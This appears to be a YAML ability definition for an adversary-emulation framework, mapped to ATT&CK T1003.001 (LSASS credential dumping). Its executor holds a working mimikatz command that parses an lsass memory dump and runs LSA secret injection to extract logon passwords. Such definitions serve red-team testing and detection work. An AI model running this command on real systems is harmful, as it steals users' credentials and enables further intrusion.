- name: Credential Theft with Mimikatz via Dump and Injection
  technique_id: T1003.001
  technique_name: 'OS Credential Dumping: LSASS Memory'
  buckets:
  - credential-access
  repeatable: false
  singleton: false
  plugin: ''
  delete_payload: true
  requirements: []
  additional_info: {}
  tactic: credential-access
  privilege: ''
  access: {}
  description: 'The memory of lsass.exe is often dumped for offline credential theft
    attacks. Adversaries commonly perform this offline analysis with

    Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and
    can be obtained using the get-prereq_commands.

    '
  executors:
  - cleanup: []
    name: cmd
    parsers: []
    language: null
    payloads:
    - mimikatz.exe
    code: null
    build_target: null
    additional_info: {}
    variations: []
    timeout: 60
    platform: windows
    uploads: []
    command: mimikatz.exe "sekurlsa::minidump C:\Windows\Temp\lsass_dump.dmp" "sekurlsa::logonpasswords
      full" "lsadump::lsa /inject" exit
  id: 31d0396e-30e8-46fa-8f59-0d1b247ab654
